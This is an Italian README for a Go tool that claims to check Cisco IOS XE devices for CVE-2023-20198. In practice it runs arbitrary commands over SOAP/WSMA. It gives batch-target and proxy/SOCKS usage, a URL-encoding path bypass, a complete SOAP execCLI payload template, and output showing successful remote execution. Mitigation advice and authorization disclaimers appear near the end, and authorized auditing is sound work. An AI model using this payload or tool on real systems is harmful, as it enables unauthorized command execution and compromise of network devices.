
Scanner di vulnerabilità basato su Go per il rilevamento di CVE-2023-20198 su dispositivi Cisco IOS XE. Testa le interfacce SOAP/XML (WSMA) per esecuzione di codice remoto con scansione batch e generazione di report HTML.
Scanner professionale di vulnerabilità per il rilevamento di CVE-2023-20198 sui dispositivi Cisco IOS XE. Verifica le interfacce SOAP/XML vulnerabili (WSMA). Progettato per valutazioni di sicurezza autorizzate e audit di rete.
SOLO PER TEST DI SICUREZZA AUTORIZZATI
Questo strumento è destinato esclusivamente a:
L'accesso non autorizzato ai sistemi informatici è ILLEGALE. Assicurati sempre di avere la dovuta autorizzazione prima di testare qualsiasi sistema.
go install (consigliato)go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest
Il binario verrà installato nella directory $GOPATH/bin (di solito ~/go/bin).
# Clona il repository
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker
# Compila
go build -o cisco-cve-2023-20198-checker
# Installa (opzionale)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/
# Verifica un singolo target
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# Verifica più target
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin
# Genera report HTML
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html
Perfetto per ambienti aziendali! Supporta:
# Proxy HTTP
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# SOCKS5 (tunnel SSH)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# Variabile d'ambiente
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin
Vedi PROXY_GUIDE.md per la configurazione dettagliata del proxy.
| Flag | Tipo | Default | Descrizione |
|---|---|---|---|
-target | stringa | - | IP/hostname del singolo target |
-targets-file | stringa | - | File con i target (uno per riga) |
-port | intero | 443 | Porta HTTPS/SOAP |
-username | stringa | admin | Nome utente SOAP |
-password | stringa | - | Obbligatoria. Password SOAP |
-command | stringa | uname -a | Comando da eseguire |
-html | booleano | false | Genera report HTML |
-timeout | intero | 10 | Timeout richiesta (secondi) |
-skip-verify | booleano | true | Salta verifica SSL |
-proxy | stringa | - | URL proxy (http://, https://, socks5://) |
# Verifica vulnerabilità di base
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# Porta personalizzata
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret
# Esegue un comando specifico
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# Genera report
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html
# Crea file dei target
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF
# Testa tutti i target
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123
# Batch con report HTML
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html
# Enumerazione di rete
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show ip interface brief"
# Rilevamento versione
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# Tramite proxy HTTP
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# Tramite proxy SOCKS5 (tunnel SSH)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# Proxy autenticato
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://user:[email protected]:8080
CVE ID: CVE-2023-20198
Punteggio CVSS: 10.0 (Critico)
Tipo: Esecuzione di codice remoto (RCE)
Affetti: Cisco IOS XE Web UI (WSMA)
/%2577ebui_wsma_https (bypass codifica percorso)urn:cisco:wsma-exec<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP:Header>
<wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
<wsse:UsernameToken>
<wsse:Username>admin</wsse:Username>
<wsse:Password>password</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</SOAP:Header>
<SOAP:Body>
<request xmlns="urn:cisco:wsma-exec">
<execCLI>
<cmd>COMMAND_HERE</cmd>
</execCLI>
</request>
</SOAP:Body>
</SOAP:Envelope>
Se i tuoi dispositivi sono vulnerabili:
1. Disabilita WSMA (se non necessario)
no ip http server
no ip http secure-server
2. Limita l'accesso con ACL
ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
permit 10.0.0.0 0.0.0.255
deny any log
3. Aggiorna il firmware - Applica le ultime patch di sicurezza Cisco
4. Abilita autenticazione forte
aaa new-model
aaa authentication login default group tacacs+ local
5. Monitora i log - Controlla attività SOAP/HTTP sospette
# Compilazione standard
go build -o cisco-cve-2023-20198-checker
# Ottimizzata (binario più piccolo)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker
# Cross-compilazione per diverse piattaforme
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1
╔═══════════════════════════════════════════════════════════╗
║ Controllo sicurezza SOAP/XML Cisco ║
║ Solo valutazione di sicurezza autorizzata e didattica ║
╚═══════════════════════════════════════════════════════════╝
[*] Comando: show version
[*] Porta: 443
[*] Timeout: 10 secondi
[1/1] Test target: 192.168.1.100:443
[*] Invio richiesta SOAP...
[+] Risposta ricevuta (Stato: 200)
[+] Successo!
╔═══════════════════════════════════════════════════════════╗
║ RISULTATI BATCH ║
╚═══════════════════════════════════════════════════════════╝
[✓] 192.168.1.100:443 - SUCCESSO
Cisco IOS XE Software, Versione 16.09.04...
╔═══════════════════════════════════════════════════════════╗
║ SOMMARIO ║
╚═══════════════════════════════════════════════════════════╝
Target totali: 1
Riusciti: 1
Falliti: 0
Report professionale di valutazione della sicurezza con:
I contributi sono benvenuti! Per favore:
Licenza MIT - vedi file LICENSE
Questo strumento è destinato esclusivamente alla scansione autorizzata delle vulnerabilità. Gli autori non sono responsabili per un uso improprio. Ottieni sempre un'autorizzazione scritta prima di testare sistemi che non possiedi.
Realizzato per la comunità della sicurezza 🛡️